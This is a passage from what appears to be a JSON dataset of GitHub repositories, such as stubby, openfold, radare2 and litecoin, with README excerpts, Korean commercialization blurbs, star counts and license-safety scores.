License](https://img.shields.io/github/license/victornpb/undiscord?style=flat-square)](https://github.com/victornpb/undiscord/blob/master/LICENSE)\n[![CodeFactor](https://www.codefactor.io/repository/github/victornpb/undiscord/badge?style=flat-square)](https://www.codefactor.io/repository/github/victornpb/undiscord?style=flat-square)\n![Snyk Vulnerabilities for GitHub Repo](https://img.shields.io/snyk/vulnerabilities/github/victornpb/undiscord?style=flat-square)\n[![GitHub Stars](https://img.shields.io/github/stars/victornpb/undiscord?style=flat-square)](https://github.co","composite_score":0.1306,"license_safety_tag":"unknown"},{"name":"getdnsapi/stubby","github_url":"https://github.com/getdnsapi/stubby","stars":6,"language":"C","license":"bsd-3-clause","abandonment_months":10,"description":"# Stubby (getdnsapi/stubby) 분석 보고서\n\n## 왜 보물인가\n인터넷 사용자의 개인정보 보호를 위해 DNS 조회 기록을 암호화하는 오픈소스 도구로, 온라인 프라이버시를 중시하는 개인과 기업들의 수요가 지속적으로 증가하고 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 기업 보안 솔루션 SaaS**\n기업의 직원들이 안전한 인터넷을 사용하도","readme_excerpt":"# About Stubby\n\nStubby is an application that acts as a local **DNS Privacy stub resolver** (using DNS-over-TLS). Stubby encrypts DNS queries sent \nfrom a client machine (desktop or laptop) to a DNS Privacy resolver increasing end user privacy. Stubby is in the early stages \nof development but is suitable for technical/advanced users. A more generally user-friendly version is on the way!\n\nStubby provides DNS Privacy by:\n\n* Running as a daemon\n* Listening on the loopback address to send all outgoing DNS queries received on that address out over TLS\n* Using a default configuration which provides Strict Privacy and uses a subset\nof the available [DNS Privacy servers](https://dnsprivacy.org/test_servers/)\n\nStubby is developed by the getdns team.\n\nStubby can be used as a command line tool requiring the user to manually modify the system DNS resolvers. A development version of a Stubby Manager GUI is also available for Windows, see [Stubby Mananger GUI](https://dnsprivacy.org/wiki/display/DP","composite_score":0.1305,"license_safety_tag":"safe"},{"name":"aqlaboratory/openfold","github_url":"https://github.com/aqlaboratory/openfold","stars":5,"language":"Python","license":"Apache-2.0","abandonment_months":5,"description":"# OpenFold 저장소 분석\n\n## 왜 보물인가\n단백질의 3차원 구조를 인공지능으로 예측하는 기술로, 신약 개발과 생명과학 연구에 혁명적인 도구가 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **신약 개발 SaaS**: 제약사들이 월 구독으로 단백질 구조 분석 서비스를 이용하는 플랫폼\n2. **대학·연구기관 내부 도구**: 생명과학 연구팀이 자체 ","readme_excerpt":"![header ](imgs/of_banner.png)\n_Figure: Comparison of OpenFold and AlphaFold2 predictions to the experimental structure of PDB 7KDX, chain B._\n\n# OpenFold\n\nA faithful but trainable PyTorch reproduction of DeepMind's \n[AlphaFold 2](https://github.com/deepmind/alphafold).\n\n# Documentation\nSee our new home for docs at [openfold.readthedocs.io](https://openfold.readthedocs.io/en/latest/), with instructions for installation and model inference/training.\n\nMuch of the content from this page may be found [here.](https://github.com/aqlaboratory/openfold/blob/main/docs/source/original_readme.md)\n\n## Copyright Notice\n\nWhile AlphaFold's and, by extension, OpenFold's source code is licensed under\nthe permissive Apache Licence, Version 2.0, DeepMind's pretrained parameters \nfall under the CC BY 4.0 license, a copy of which is downloaded to \n`openfold/resources/params` by the installation script. Note that the latter\nreplaces the original, more restrictive CC BY-NC 4.0 license as of January 2022.\n\n##","composite_score":0.1305,"license_safety_tag":"safe"},{"name":"MoePlayer/DPlayer","github_url":"https://github.com/MoePlayer/DPlayer","stars":6,"language":"JavaScript","license":"mit","abandonment_months":3,"description":"# DPlayer 분석 보고서\n\n## 왜 보물인가\n웹사이트나 앱에서 동영상을 깔끔하게 재생할 수 있게 해주는 오픈소스 도구로, 누구나 무료로 사용하고 개선할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 강의 플랫폼**: 유튜브 같은 교육용 동영상 서비스에 DPlayer를 탑재하여 강의 재생 기능 제공\n2. **뉴스/미디어 웹사이트**: 신문사나","readme_excerpt":"<p align=\"center\">\n<img src=\"https://i.imgur.com/LnPvZvO.png\" alt=\"ADPlayer\" width=\"100\">\n</p>\n<h1 align=\"center\">DPlayer</h1>\n\n> 🍭 Wow, such a lovely HTML5 danmaku video player\n\n[![npm](https://img.shields.io/npm/v/dplayer.svg?style=flat-square)](https://www.npmjs.com/package/dplayer)\n[![npm](https://img.shields.io/npm/l/dplayer.svg?style=flat-square)](https://github.com/MoePlayer/DPlayer/blob/master/LICENSE)\n[![npm](https://img.shields.io/npm/dt/dplayer.svg?style=flat-square)](https://www.npmjs.com/package/dplayer)\n[![](https://data.jsdelivr.com/v1/package/npm/dplayer/badge)](https://www.jsdelivr.com/package/npm/dplayer)\n\n## Introduction\n\n![image](https://i.imgur.com/207ch36.jpg)\n\nDPlayer is a lovely HTML5 danmaku video player to help people build video and danmaku easily.\n\n**DPlayer supports:**\n\n-   Streaming formats\n    -   [HLS](https://github.com/video-dev/hls.js)\n    -   [FLV](https://github.com/Bilibili/flv.js)\n    -   [MPEG DASH](https://github.com/Dash-Industry-Forum/dash.js)","composite_score":0.1304,"license_safety_tag":"safe"},{"name":"duilib/duilib","github_url":"https://github.com/duilib/duilib","stars":14,"language":"C++","license":"mit","abandonment_months":3,"description":"# duilib/duilib 상용화 분석\n\n## 왜 보물인가\nWindows 프로그램을 쉽게 만들 수 있게 도와주는 기초 도구로, 많은 기업 소프트웨어와 게임에서 사용되는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **기업 업무용 소프트웨어 개발 플랫폼**: 회계, 인사, 재고관리 등 Windows 기반 업무 도구를 빠르게 만들 수 있는 개발 환경 제","readme_excerpt":"# Duilib\n\nDuilib是一个Windows下免费开源的DirectUI界面库，由于简约易扩展的设计以及稳定高效的实现被各大互联网公司普遍接受，广泛应用于包括IM、视频客户端、股票行情软件、导航软件、手机辅助软件、安全软件等多个行业的众多pc客户端软件。Duilib还在不断的发展中，在文档、例子、动画、渲染引擎等多个方面将持续改进。\n\n欢迎为Duilib提供功能改进、代码修补、bug反馈、使用文档和献计献策，让我们一起把Duilib做的更好！\n\n# 快速安装\n\n您可以使用[vcpkg](https://github.com/Microsoft/vcpkg)库管理器下载并安装duilib:\n\n    git clone https://github.com/Microsoft/vcpkg.git\n    cd vcpkg\n    ./bootstrap-vcpkg.sh\n    ./vcpkg integrate install\n    ./vcpkg install duilib\n\nvcpkg中的duilib库由Microsoft团队成员和社区贡献者保持最新状态。如果版本过时，请在vcpkg存储库上[创建问题或请求请求](https://github.com/Microsoft/vcpkg)。\n\n# 基于Duilib的软件不完全列表\nDuilib自2010年8月21日发布以来，获得了众多开发者和大公司的信赖，在各行各业的软件中得到了广泛应用，以下是一个作者知道不完全列表，欢迎大家补充指正\nhttps://github.com/duilib/duilib/wiki/%E5%9F%BA%E4%BA%8EDuilib%E7%9A%84%E8%BD%AF%E4%BB%B6%E4%B8%8D%E5%AE%8C%E5%85%A8%E5%88%97%E8%A1%A8\n\n下面两个修改版本大家可以参考一下\n\n# 腾讯使用的的duilib修改版\nhttps://github.com/TencentCloud/TIMSDK/tree/master/Windows/Demo/Basic/duilib\n\n# 网易使用的duilib修改版\nhttps://github.com/netease-im/NIM_Duilib_Framework/tree/master/duilib\n","composite_score":0.1303,"license_safety_tag":"safe"},{"name":"vashpan/xcode-dev-cleaner","github_url":"https://github.com/vashpan/xcode-dev-cleaner","stars":5,"language":"Swift","license":"GPL-3.0","abandonment_months":7,"description":"# Xcode Dev Cleaner 상용화 분석\n\n## 왜 보물인가\nMac 개발자들이 개발 도구로 인해 쌓이는 불필요한 파일들을 자동으로 정리해주는 유틸리티로, 컴퓨터 저장공간을 확보하면서 개발 속도를 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**: 월 구독형 Mac 청소 애플리케이션으로 출시하여 개발자들에게 자동 정리 기능을","readme_excerpt":"# DevCleaner\n\n![Main Window Screenshot](https://github.com/vashpan/xcode-cleaner/raw/master/Documentation/Main%20Window%20Screenshot.png)\n\n*Currently tested with macOS 14.x and Xcode 15.x. Should support earlier Xcode versions as well*\n\nAvailable on the [Mac App Store](https://itunes.apple.com/app/devcleaner/id1388020431)\n\nIf you want to reclaim tens of gigabytes of your storage used for various Xcode caches - this tool is for you!\n\nXcode could store tens of gigabytes in `~/Developer` folder. Most of those cached files & symbols is not reclaimed over time\nand could consume a large amount of your storage, which is especially important if you have relatively small SSD drive.\n\nDevCleaner gives you an easy way to inspect auto-generated files and clean them if necessary. It could also remind you about \nscan after a while.\n\nPlease note that **this application is relying on internal folder structures and undocumented features**. It could stop working with\nnewer versions of Xcode! I tried to m","composite_score":0.1301,"license_safety_tag":"restricted"},{"name":"Cpp-Club/Cxx_HOPL4_zh","github_url":"https://github.com/Cpp-Club/Cxx_HOPL4_zh","stars":22,"language":"","license":"unknown","abandonment_months":6,"description":"# Cpp-Club/Cxx_HOPL4_zh 분석 보고서\n\n## 왜 보물인가\nC++ 프로그래밍 언어의 역사와 철학을 정리한 교육 자료로, 소프트웨어 개발자들이 현대적인 프로그래밍 기초를 이해하는 데 필수적인 학습 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼 (SaaS)**: 프로그래밍 학원이나 대학교 온라인 강좌에서 C++ 학습자에게 ","readme_excerpt":"# 在纷繁多变的世界里茁壮成长：C++ 2006–2020\n\n这是 C+&#x200d;+ 之父 Bjarne Stroustrup 的 [HOPL4 论文](https://www.stroustrup.com/hopl20main-p5-p-bfc9cd4--final.pdf)的中文版。\n\n[HOPL](https://dl.acm.org/conference/hopl) 是 History of Programming Languages（编程语言历史）的缩写，是 [ACM](https://www.acm.org/)（Association of Computing Machines，国际计算机协会）旗下的一个会议，约每十五年举办一次。Bjarne 的这篇论文是他为 2021 年 [HOPL IV 会议](https://hopl4.sigplan.org/)准备的论文，也是他的第三篇 HOPL 论文。在这三篇前后间隔近三十年的论文里，Bjarne 记录了 C+&#x200d;+ 的完整历史，从 1979 年到 2020 年。这篇 HOPL4 论文尤其重要，因为它涵盖了 C+&#x200d;+98 之后的所有 C+&#x200d;+ 版本，从 C+&#x200d;+11 直到 C+&#x200d;+20。如果你对更早期的历史也感兴趣的话，则可以参考[他的其他 HOPL 论文](https://www.stroustrup.com/papers.html)，及他在 1994 年出版的《C+&#x200d;+ 语言的设计和演化》（*The Design and Evolution of C+&#x200d;+*）。\n\n鉴于这篇论文对于 C+&#x200d;+ 从业者的重要性，[全球 C+&#x200d;+ 及系统软件技术大会](http://cpp-summit.org/)的主办方 [Boolan](http://boolan.com/) 组织了一群译者，把这篇重要论文翻译成了中文，让 C+&#x200d;+ 开发人员对 C+&#x200d;+ 的设计原则和历史有一个系统的了解。下面是论文的完整摘要：\n\n> 到 2006 年时，C+&#x200d;+ 已经在业界广泛使用了 20 年。它既包含了自 1970 年代初引入 C 语言以来一直没有改变的部分，又包含了","composite_score":0.13,"license_safety_tag":"unknown"},{"name":"okonet/lint-staged","github_url":"https://github.com/okonet/lint-staged","stars":7,"language":"JavaScript","license":"mit","abandonment_months":0,"description":"# lint-staged 저장소 분석\n\n## 왜 보물인가\n개발자들이 코드를 제출하기 전에 자동으로 오류를 검사하고 정리해주는 도구로, 품질 관리 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 클라우드 기반 코드 품질 관리 플랫폼**\nGitHub/GitLab과 연동하여 팀의 모든 코드 제출을 자동으로 검사하고 리포트하","readme_excerpt":"# 🚫💩 lint-staged\n\n[![npm version](https://badge.fury.io/js/lint-staged.svg)](https://badge.fury.io/js/lint-staged)\n\n---\n\nRun tasks like formatters and linters against staged git files and don't let :poop: slip into your code base!\n\n```bash\nnpm install --save-dev lint-staged # requires further setup\n```\n\n```\n$ git commit\n\n✔ Backed up original state in git stash (5bda95f)\n❯ Running tasks for staged files...\n  ❯ packages/frontend/.lintstagedrc.json — 1 file\n    ↓ *.js — no files [SKIPPED]\n    ❯ *.{json,md} — 1 file\n      ⠹ prettier --write\n  ↓ packages/backend/.lintstagedrc.json — 2 files\n    ❯ *.js — 2 files\n      ⠼ eslint --fix\n    ↓ *.{json,md} — no files [SKIPPED]\n◼ Updating Git index again...\n◼ Cleaning up temporary files...\n```\n\n<details>\n<summary>See asciinema video</summary>\n\n[![asciicast](https://asciinema.org/a/199934.svg)](https://asciinema.org/a/199934)\n\n</details>\n\n> [!Tip]\n> Do you only want to check staged files for errors, but not edit them automatically?  \n> You might be ","composite_score":0.1298,"license_safety_tag":"safe"},{"name":"W4RH4WK/Debloat-Windows-10","github_url":"https://github.com/W4RH4WK/Debloat-Windows-10","stars":7,"language":"PowerShell","license":"NOASSERTION","abandonment_months":8,"description":"# W4RH4WK/Debloat-Windows-10 분석\n\n## 왜 보물인가\nWindows 10에 설치된 불필요한 프로그램들을 자동으로 제거해서 컴퓨터를 빠르고 깔끔하게 만드는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **PC 최적화 SaaS 서비스**: 개인 사용자가 월 구독으로 자동 최적화 기능을 받도록 판매\n2. **기업 IT 관리 도구**: 회사","readme_excerpt":"# Debloat Windows 10\n\n🕯️ **End of Life:**\nWindows 10 is officially end of life in October.\nThis repository is therefore deprecated.\n\n**Attention:**\nApparently there is an issue where running the scripts results in a broken user account / system.\nSo far, there is only little information what actually causes this.\nSee the [corresponding issue](https://github.com/W4RH4WK/Debloat-Windows-10/issues/306).\n\n**Note about Windows 11:**\nThis project does not directly support Windows 11.\nThings might work, or might not work - find out if you are brave.\nDo not expect this project to transition to Windows 11 as the maintainer lacks the time to do so.\n\nThis project collects PowerShell scripts which help to *debloat* Windows 10,\ntweak common settings and install basic software components.\n\nI test these scripts on a Windows 10 Professional 64-Bit (English) virtual\nmachine. Please let me know if you encounter any issues. Home Edition and\ndifferent languages are not supported. These scripts are intended","composite_score":0.1297,"license_safety_tag":"unknown"},{"name":"edenhill/librdkafka","github_url":"https://github.com/edenhill/librdkafka","stars":5,"language":"C","license":"NOASSERTION","abandonment_months":0,"description":"# librdkafka 저장소 분석\n\n## 왜 보물인가\n전 세계 수백만 개 애플리케이션이 실시간 데이터를 주고받을 때 사용하는 핵심 기반 기술로, 안정성과 성능이 검증된 인프라 수준의 소프트웨어입니다.\n\n## 어디에 쓸 수 있나\n- **메시지 전송 SaaS**: 금융사나 물류회사의 실시간 거래 데이터를 안전하게 처리하는 중개 플랫폼\n- **내부 업무 도구*","readme_excerpt":"librdkafka - the Apache Kafka® C/C++ client library\n===================================================\n\nCopyright (c) 2012-2022, [Magnus Edenhill](http://www.edenhill.se/).\n              2023 [Confluent Inc.](https://www.confluent.io/).\n\n[https://github.com/confluentinc/librdkafka](https://github.com/confluentinc/librdkafka)\n\n**librdkafka** is a C library implementation of the\n[Apache Kafka](https://kafka.apache.org/) protocol, providing Producer, Consumer\nand Admin clients. It was designed with message delivery reliability\nand high performance in mind, current figures exceed 1 million msgs/second for\nthe producer and 3 million msgs/second for the consumer.\n\n**librdkafka** is licensed under the 2-clause BSD license.\n\nKAFKA is a registered trademark of The Apache Software Foundation and\nhas been licensed for use by librdkafka. librdkafka has no\naffiliation with and is not endorsed by The Apache Software Foundation.\n\n\n# Features\n  * Full Exactly-Once-Semantics (EOS) support\n  * High-lev","composite_score":0.1297,"license_safety_tag":"unknown"},{"name":"hakanyalcinkaya/Sifirdan-Projelerle-Yeni-Nesil-Front-End-ve-React-Egitimi","github_url":"https://github.com/hakanyalcinkaya/Sifirdan-Projelerle-Yeni-Nesil-Front-End-ve-React-Egitimi","stars":7,"language":"HTML","license":"unknown","abandonment_months":6,"description":"# hakanyalcinkaya/Sifirdan-Projelerle-Yeni-Nesil-Front-End-ve-React-Egitimi 분석\n\n## 왜 보물인가\n웹사이트를 만드는 데 필요한 최신 기술(React)을 처음부터 배울 수 있는 교육 자료 모음으로, 실제 프로젝트를 따라 만들면서 배우는 실용적인 학습 자료입니다.\n\n## 어디에 쓸 수 있나\n1. *","readme_excerpt":"# Sıfırdan Projelerle Front-End ve React Eğitimi\n[![Sıfırdan Projelerle React Öğren](https://github.com/hakanyalcinkaya/hakanyalcinkaya/blob/main/assets/img/udemy-react-v1.jpg)](https://link.hakanyalcinkaya.dev/gt-repo-react)\n\n[Sıfırdan Projelerle Front-End ve React Eğitimini İncele](https://link.hakanyalcinkaya.dev/gt-repo-react)\n\nİlerleme Durumu : ![100%](https://progress-bar.xyz/100/)\n\n## \"Hello, World!\" :)\nHazırladığım Front-End ve React eğitimi sıfırdan bu yolculuğa başlamak isteyenler için tasarlandı. Her bölümde başlangıç düzenyinden başlayarak sınırlarımızı zorlayacak ve keyifli bilgiler öğreneceğiz. \n\n## Eğitim İçeriği:\n- [x] Roadmap\n- [x] Front-End Mindset\n- [x] Kurulum\n- [x] Markdown ve Not Alma Taktikleri\n- [x] HTML\n- [x] VS-Code\n- [x] Git, GitHub ve Markdown Kullanimi\n- [x] CSS\n- [x] SCSS\n- [x] Bootstrap 5\n- [x] JavaScript\n- [x] React Temelleri (State ve Props)\n- [x] React - Form ile Calismak ve useEffect Kullanimi\n- [x] React Router Dom \n- [x] Context API\n- [x] Styled Com","composite_score":0.1296,"license_safety_tag":"unknown"},{"name":"oam-dev/kubevela","github_url":"https://github.com/oam-dev/kubevela","stars":8,"language":"Go","license":"Apache-2.0","abandonment_months":1,"description":"# KubeVela 프로젝트 분석 보고서\n\n## 왜 보물인가\n복잡한 클라우드 인프라를 간단하게 관리할 수 있는 통합 플랫폼으로, 기업의 IT 운영 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 엔터프라이즈 클라우드 관리 SaaS**\n- 기업들이 여러 클라우드 서비스를 한 곳에서 통합 관리하는 구독형 서비스로 판매 가능합니다.\n\n**2","readme_excerpt":"<div style=\"text-align: center\">\n  <p align=\"center\">\n    <img src=\"https://raw.githubusercontent.com/kubevela/kubevela.io/main/docs/resources/KubeVela-03.png\">\n    <br><br>\n    <i>Make shipping applications more enjoyable.</i>\n  </p>\n</div>\n\n![Build status](https://github.com/kubevela/kubevela/workflows/Go/badge.svg)\n[![Go Report Card](https://goreportcard.com/badge/github.com/kubevela/kubevela)](https://goreportcard.com/report/github.com/kubevela/kubevela)\n![Docker Pulls](https://img.shields.io/docker/pulls/oamdev/vela-core)\n[![codecov](https://codecov.io/gh/kubevela/kubevela/branch/master/graph/badge.svg)](https://codecov.io/gh/kubevela/kubevela)\n[![LICENSE](https://img.shields.io/github/license/kubevela/kubevela.svg?style=flat-square)](/LICENSE)\n[![Releases](https://img.shields.io/github/release/kubevela/kubevela/all.svg?style=flat-square)](https://github.com/kubevela/kubevela/releases)\n[![TODOs](https://img.shields.io/endpoint?url=https://api.tickgit.com/badge?repo=github.com/kube","composite_score":0.1295,"license_safety_tag":"safe"},{"name":"radare/radare2","github_url":"https://github.com/radare/radare2","stars":8,"language":"C","license":"lgpl-3.0","abandonment_months":0,"description":"# Radare2 프로젝트 분석\n\n## 왜 보물인가\n컴퓨터 프로그램의 내부 구조를 들여다보고 분석할 수 있는 강력한 도구로, 보안 전문가부터 소프트웨어 개발자까지 광범위하게 필요로 합니다.\n\n## 어디에 쓸 수 있나\n1. **보안 점검 SaaS**: 기업의 소프트웨어가 안전한지 자동으로 검사해주는 클라우드 서비스\n2. **내부 감시 도구**: 대기업의 개발","readme_excerpt":"<a href=\"https://radare.org/\"><img border=0 src=\"doc/images/r2emoji.png\" alt=\"screenshot\" align=\"left\" width=\"128px\"></a>\n\n## Radare2: Libre Reversing Framework for Unix Geeks\n\n[![Latest packaged version](https://repology.org/badge/latest-versions/radare2.svg)](https://repology.org/project/radare2/versions) [![Tests Status](https://github.com/radareorg/radare2/actions/workflows/ci.yml/badge.svg?branch=master)](https://github.com/radareorg/radare2/actions/workflows/ci.yml?query=branch%3Amaster) [![build](https://github.com/radareorg/radare2/actions/workflows/build.yml/badge.svg?branch=master)](https://github.com/radareorg/radare2/actions/workflows/build.yml?query=branch%3Amaster) [![tcc](https://github.com/radareorg/radare2/actions/workflows/tcc.yml/badge.svg?branch=master)](https://github.com/radareorg/radare2/actions/workflows/tcc.yml)\n[![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/741/badge)](https://bestpractices.coreinfrastructure.org/projects/741) [![","composite_score":0.1293,"license_safety_tag":"restricted"},{"name":"dubbogo/go-zookeeper","github_url":"https://github.com/dubbogo/go-zookeeper","stars":5,"language":"Go","license":"BSD-3-Clause","abandonment_months":7,"description":"# dubbogo/go-zookeeper 분석 보고서\n\n## 왜 보물인가\n여러 서버를 효율적으로 관리하고 조정하는 데 필수적인 기술로, 대규모 온라인 서비스를 안정적으로 운영하려는 기업에게 핵심 인프라입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 멀티 클라우드 통합 관리 SaaS**\n기업의 여러 클라우드 서버를 한 곳에서 관리하는 웹 서비스로 제공하여 월 ","readme_excerpt":"Native Go Zookeeper Client Library\n===================================\n\n[![GoDoc](https://godoc.org/github.com/samuel/go-zookeeper?status.svg)](https://godoc.org/github.com/samuel/go-zookeeper)\n[![Build Status](https://travis-ci.org/samuel/go-zookeeper.png)](https://travis-ci.org/samuel/go-zookeeper)\n[![Coverage Status](https://coveralls.io/repos/github/samuel/go-zookeeper/badge.svg?branch=master)](https://coveralls.io/github/samuel/go-zookeeper?branch=master)\n\nLicense\n-------\n\n3-clause BSD. See LICENSE file.\n","composite_score":0.1293,"license_safety_tag":"safe"},{"name":"odoo/tutorials","github_url":"https://github.com/odoo/tutorials","stars":160,"language":"Python","license":"NOASSERTION","abandonment_months":0,"description":"","readme_excerpt":"","composite_score":0.1291,"license_safety_tag":"unknown"},{"name":"litecoin-project/litecoin","github_url":"https://github.com/litecoin-project/litecoin","stars":14,"language":"C++","license":"mit","abandonment_months":1,"description":"# Litecoin 저장소 분석\n\n## 왜 보물인가\n라이트코인은 비트코인 다음으로 오래되고 검증된 암호화폐로, 글로벌 금융 인프라에 필요한 안정적인 결제 기술을 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **암호화폐 거래소 SaaS**: 거래소 운영사에 라이트코인 입출금 시스템을 클라우드 기반으로 제공\n2. **결제 게이트웨이 API**: 온라인 쇼핑몰에","readme_excerpt":"Litecoin Core integration/staging tree\n=====================================\n\n[![Build Status](https://travis-ci.org/litecoin-project/litecoin.svg?branch=master)](https://travis-ci.org/litecoin-project/litecoin)\n\nhttps://litecoin.org\n\nWhat is Litecoin?\n----------------\n\nLitecoin is an experimental digital currency that enables instant payments to\nanyone, anywhere in the world. Litecoin uses peer-to-peer technology to operate\nwith no central authority: managing transactions and issuing money are carried\nout collectively by the network. Litecoin Core is the name of open source\nsoftware which enables the use of this currency.\n\nFor more information, as well as an immediately useable, binary version of\nthe Litecoin Core software, see [https://litecoin.org](https://litecoin.org).\n\nLicense\n-------\n\nLitecoin Core is released under the terms of the MIT license. See [COPYING](COPYING) for more\ninformation or see https://opensource.org/licenses/MIT.\n\nDevelopment Process\n-------------------\n\nThe `","composite_score":0.1282,"license_safety_tag":"safe"},{"name":"pankod/refine","github_url":"https://github.com/pankod/refine","stars":6,"language":"TypeScript","license":"MIT","abandonment_months":1,"description":"# Refine 저장소 분석\n\n## 왜 보물인가\n누구나 쉽게 관리 시스템(대시보드)을 만들 수 있도록 도와주는 오픈소스 틀(프레임워크)입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객사별 데이터 관리 대시보드를 빠르게 구축하여 월 $29-199 구독료로 판매\n2. **내부 업무 도구**: 대기업의 인사, 재무, 재고 관리 시스템을 기존","readme_excerpt":"<div align=\"center\">\n<a href=\"https://refine.dev/core\">\n    <img alt=\"refine logo\" src=\"https://refine.ams3.cdn.digitaloceanspaces.com/readme/refine-readme-banner.png\">\n</a>\n\n<br/>\n<br/>\n\n<div align=\"center\">\n    <a href=\"https://refine.dev/core/\">Home Page</a> |\n    <a href=\"https://refine.dev/core/docs/\">Documentation</a> |\n    <a href=\"https://refine.dev/core/templates/\">Examples</a> |\n    <a href=\"https://discord.gg/refine\">Discord</a> |\n    <a href=\"https://refine.dev/blog/\">Blog</a> |\n    <a href=\"https://refine.dev/\">Refine</a>\n</div>\n</div>\n\n<br/>\n<br/>\n\n<div align=\"center\"><strong>The sweet spot between the low/no code and “starting from scratch” for CRUD-heavy applications.</strong><br>\n\nRefine Core is an open source, React meta-framework for enterprise. It provides a headless solution for everything from admin panels to\ndashboards and internal tools.\n<br />\n\n<strong>Refine CORE also powers <a href=\"https://refine.dev/\">Refine's purpose built AI agent.</a></strong>\n<br />\n\n</","composite_score":0.1281,"license_safety_tag":"safe"},{"name":"WojtekTB/Chesscom-to-lichess-games","github_url":"https://github.com/WojtekTB/Chesscom-to-lichess-games","stars":11,"language":"JavaScript","license":"MIT","abandonment_months":7,"description":"# Chesscom-to-lichess-games 분석\n\n## 왜 보물인가\n체스닷컴에서 플레이한 게임 기록을 라이체스(무료 체스 플랫폼)로 자동 이전해주는 도구로, 게임 데이터를 잃지 않고 플랫폼을 자유롭게 옮길 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 월 구독형으로 운영하며 자동 동기화, 정기적 백업, 고급 분석 기능 ","readme_excerpt":"# Chess.com to Lichess games\nThis is an extension for Chrome and Firefox to import chess.com games to lichess.org in one click!\n\n## Why?\nLichess offers free computer analysis (there is a 35 per day limit).\n\n## How do I install it?\n### Chrome\n[Go here](https://chrome.google.com/webstore/detail/chesscom-to-lichess/jblnpdempinkonbjejolagghdofaipjf?hl=en&authuser=1)\n\n### Firefox\n[Go here](https://addons.mozilla.org/en-US/firefox/addon/chess-com-to-lichess/)\n\n## How to use it?\nGo to a chess.com game that is completed, and press the extension button or the **Lichess Analysis** button.  \n![chesscom-to-lichess-example-0 4](https://user-images.githubusercontent.com/34536619/120743120-373c0a00-c4ad-11eb-9d28-ab38c06e5fba.gif)\n\n## [Donations](https://www.buymeacoffee.com/17victork)\nThis is 100% optional, I will always keep this extension free and open source. Donate [here](https://www.buymeacoffee.com/17victork).\n\n## FAQ\n**Q: Can you run this on Mozilla Firefox?**  \nA: Yes! You can install it fro","composite_score":0.128,"license_safety_tag":"safe"},{"name":"pittcsc/Summer2022-Internships","github_url":"https://github.com/pittcsc/Summer2022-Internships","stars":12,"language":"Python","license":"unknown","abandonment_months":0,"description":"# pittcsc/Summer2022-Internships 분석\n\n## 왜 보물인가\n대학생들이 인턴십 기회를 한 곳에서 찾을 수 있는 실제 채용 정보 모음으로, 취업 준비생들에게 매우 실용적인 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **취업 정보 플랫폼**: 대학생 대상 인턴십 매칭 서비스로 운영 (예: 원티드, 링크드인 같은 서비스)\n2. **대학 ","readme_excerpt":"  # Summer 2026 Tech Internships by Pitt CSC & Simplify\n\n  We're back! Use this repo to share and keep track of **Summer 2026 tech internships** across software, data science, quant, and more. The list is updated and maintained daily by the [Pitt Computer Science Club](https://pittcsc.org/) and [Simplify](https://simplify.jobs/)!\n\n\n  🧠 For valuable tips on navigating the internship process, be sure to check out our guide: [**Zero to Offer**](https://web.archive.org/web/20250319235510/https://pittcs.wiki/zero-to-offer/) 🧠 \n\n  🙏 **Contribute by submitting an [issue](https://github.com/SimplifyJobs/Summer2026-Internships/issues/new/choose)! See the contribution guidelines [here](./CONTRIBUTING.md)!** 🙏\n\n---\n\n### Browse 557 Internship Roles by Category\n\n💻 **[Software Engineering](https://github.com/SimplifyJobs/Summer2026-Internships/blob/dev/README.md#-software-engineering-internship-roles)** (205)\n\n📱 **[Product Management](https://github.com/SimplifyJobs/Summer2026-Internships/blob/dev/R","composite_score":0.1274,"license_safety_tag":"unknown"},{"name":"lyrric/seckill","github_url":"https://github.com/lyrric/seckill","stars":8,"language":"Java","license":"unknown","abandonment_months":5,"description":"# lyrric/seckill 저장소 분석\n\n## 왜 보물인가\n온라인 쇼핑몰이나 티켓팅 서비스에서 동시에 몰려드는 고객들을 효율적으로 처리할 수 있는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 소셜커머스 플랫폼이 번개 세일 기간에 서버 안정성을 높이기 위해 도입\n2. **내부 업무 도구**: 대형 유통업체의 자사 이커머머스 백엔드","readme_excerpt":"# 此项目已停止维护  \n现在九价很好预约了，希望大家都能打到九价，再也不用经历之前的那种一苗难求的时代了。\n","composite_score":0.1271,"license_safety_tag":"unknown"},{"name":"linkedin/school-of-sre","github_url":"https://github.com/linkedin/school-of-sre","stars":5,"language":"HTML","license":"NOASSERTION","abandonment_months":5,"description":"# LinkedIn School of SRE 분석\n\n## 왜 보물인가\n대규모 기업들이 사용하는 시스템 안정성 관리 방법을 무료로 배울 수 있는 교육 자료이기 때문입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 이 교육 과정을 기반으로 \"시스템 안정성 진단 플랫폼\"을 만들어 중소 IT회사에 월 구독으로 판매\n2. **내부 업무 도구**: ","readme_excerpt":"# School of SRE\n\n<img src=\"img/sos.png\" width=200 >\n\nSite Reliability Engineers (SREs) sits at the intersection of software engineering and systems engineering. While there are potentially infinite permutations and combinations of how infrastructure and software components can be put together to achieve an objective, focusing on foundational skills allows SREs to work with complex systems and software, regardless of whether these systems are proprietary, 3rd party, open systems, run on cloud/on-prem infrastructure, etc. Particularly, it is important to gain a deep understanding of how these areas of systems and infrastructure relate to each other and interact with each other. The combination of software and systems engineering skills is rare and is generally built over time with exposure to a wide variety of infrastructure, systems, and software. \n\nSREs bring in engineering practices to keep the site up. Each distributed system is an agglomeration of many components. SREs validate busi","composite_score":0.127,"license_safety_tag":"unknown"},{"name":"microsoft/EconML","github_url":"https://github.com/microsoft/EconML","stars":8,"language":"Jupyter 